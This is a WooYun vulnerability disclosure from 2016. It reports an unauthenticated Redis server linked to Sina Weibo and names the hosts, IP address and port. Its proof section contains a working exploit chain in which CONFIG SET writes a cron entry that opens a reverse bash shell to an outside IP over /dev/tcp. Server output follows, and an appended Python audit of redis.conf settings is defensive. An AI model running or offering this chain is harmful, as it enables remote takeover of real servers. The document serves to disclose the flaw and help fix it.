
Vulnerability summary

Defect ID: wooyun-2016-0195480

Title: Improper control of a Sina Weibo server (remote shell possible)

Vendor: Sina Weibo

Author: 猪猪侠

Submitted: 2016-04-12 16:06

Fixed: 2016-05-28 11:10

Published: 2016-05-28 11:10

Vulnerability type: Unauthorized access / permission bypass

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2016-04-12: Details sent to the vendor; awaiting vendor handling
2016-04-13: Vendor confirmed; details visible to the vendor only
2016-04-23: Details disclosed to core white hats and relevant domain experts
2016-05-03: Details disclosed to regular white hats
2016-05-13: Details disclosed to intern white hats
2016-05-28: Details disclosed to the public

Brief description:

A Sina Weibo server can be popped for a shell directly, like this; I will hold off on submitting the SQL injection for now.
Saw a /opt/dbbackup directory containing MySQL database directories named weibo_user and weibo_data. Stunned.

Detailed description:

#1 Affected servers
zhaopin.weibo.cn
zhaopin.weibo.com
renmai.weibo.com
redis: 59.151.119.139
port: 7377
#2 info
redis-cli -h 59.151.119.139 -p 7377 > info

redis 59.151.119.139:7377> info
# Server
redis_version:2.6.16
redis_git_sha1:00000000
redis_git_dirty:0
redis_mode:standalone
os:Linux 2.6.32-358.el6.x86_64 x86_64
arch_bits:64
multiplexing_api:epoll
gcc_version:4.4.6
process_id:4043
run_id:0f89bdc9a6b581d090794c2958a66378f908ac7c
tcp_port:7377
uptime_in_seconds:3870141
uptime_in_days:44
hz:10
lru_clock:1341304
# Clients
connected_clients:94
client_longest_output_list:0
client_biggest_input_buf:0
blocked_clients:0
# Memory
used_memory:2912472
used_memory_human:2.78M
used_memory_rss:47570944
used_memory_peak:12092599096

Proof of vulnerability:

#3 exp get shell

redis-cli flushall                            # empty the dataset so the dump contains only the payload
echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/114.114.114.114/53 0>&1\n\n"|redis-cli -x set 1   # store a crontab line as a value
redis-cli config set dir /var/spool/cron/     # redirect the RDB dump into the cron spool
redis-cli config set dbfilename root          # name the dump after the target user's crontab
redis-cli save                                # write the dump; the unauthenticated CONFIG SET is the root cause


/sbin/ifconfig
em1 Link encap:Ethernet HWaddr B8:CA:3A:66:23:8C
inet addr:59.151.119.139 Bcast:59.151.119.143 Mask:255.255.255.240
inet6 addr: fe80::baca:3aff:fe66:238c/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:39369206 errors:0 dropped:0 overruns:0 frame:0
TX packets:25652875 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:3482359996 (3.2 GiB) TX bytes:3912378525 (3.6 GiB)
Memory:dcb00000-dcc00000
em2 Link encap:Ethernet HWaddr B8:CA:3A:66:23:8D
inet addr:192.168.119.139 Bcast:192.168.119.255 Mask:255.255.255.0
inet6 addr: fe80::baca:3aff:fe66:238d/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1470362969 errors:0 dropped:0 overruns:0 frame:0
TX packets:773443973 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:125737431825 (117.1 GiB) TX bytes:83544898974 (77.8 GiB)
Memory:dcc00000-dcd00000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:482626975 errors:0 dropped:0 overruns:0 frame:0
TX packets:482626975 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:42841400037 (39.8 GiB) TX bytes:42841400037 (39.8 GiB)


#4 Proof

db1.jpg (screenshot)


db2.jpg (screenshot)

Fix recommendation:

# Add access control
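The recommended fix is a single line, so as an added example (not from the report and not Sina's code) here is a Python audit of a redis.conf that checks for the controls that would have closed this path: binding to a non-public interface, requirepass, renaming CONFIG/FLUSHALL/DEBUG, and protected-mode on 3.2 and later. Both sample configs are constructed; the default version 2.6.16 is the one shown in the INFO output above.

```python
"""Audit a redis.conf for the controls whose absence turned the Redis in this
report into a file-write primitive (constructed example, not from the report)."""
# Commands that let an unauthenticated client relocate and write the RDB dump.
DANGEROUS_COMMANDS = ("config", "flushall", "debug")
# Constructed configs: one modelled on an exposed 2.6-era instance, one hardened.
WEAK_CONF = """
port 7377
bind 0.0.0.0
"""
HARDENED_CONF = """
bind 127.0.0.1
protected-mode yes
requirepass REPLACE_WITH_LONG_RANDOM_SECRET
rename-command CONFIG ""
rename-command FLUSHALL ""
rename-command DEBUG ""
"""

def parse_redis_conf(text):
    """Return (settings, renamed): last value per directive, and renamed commands."""
    settings, renamed = {}, {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition(" ")
        key, value = key.lower(), value.strip()
        if key == "rename-command":
            cmd, _, new = value.partition(" ")
            renamed[cmd.lower()] = new.strip().strip('"')  # "" disables the command
        else:
            settings[key] = value
    return settings, renamed

def audit_redis_conf(text, redis_version="2.6.16"):
    """Return a list of findings; an empty list means every check passed."""
    settings, renamed = parse_redis_conf(text)
    findings = []
    bind = settings.get("bind")
    if bind is None or "0.0.0.0" in bind.split():  # no bind line means all interfaces
        findings.append("bind: listening on all interfaces; bind to loopback or an internal address")
    if not settings.get("requirepass"):
        findings.append("requirepass: unset; anyone who can reach the port has full control")
    for cmd in DANGEROUS_COMMANDS:
        if cmd not in renamed:
            findings.append(f"rename-command: {cmd.upper()} reachable under its default name")
    major, minor = (int(x) for x in redis_version.split(".")[:2])
    if (major, minor) < (3, 2):
        findings.append(f"version {redis_version}: predates protected-mode (3.2); upgrade")
    elif settings.get("protected-mode", "yes").lower() != "yes":
        findings.append("protected-mode: explicitly disabled")
    return findings
```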

Copyright notice: credit the source when reposting: 猪猪侠@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 6

Confirmed: 2016-04-13 11:03

Vendor reply:

Thank you for your attention to Sina security; we will notify the partner to fix this issue.

Latest status:

None yet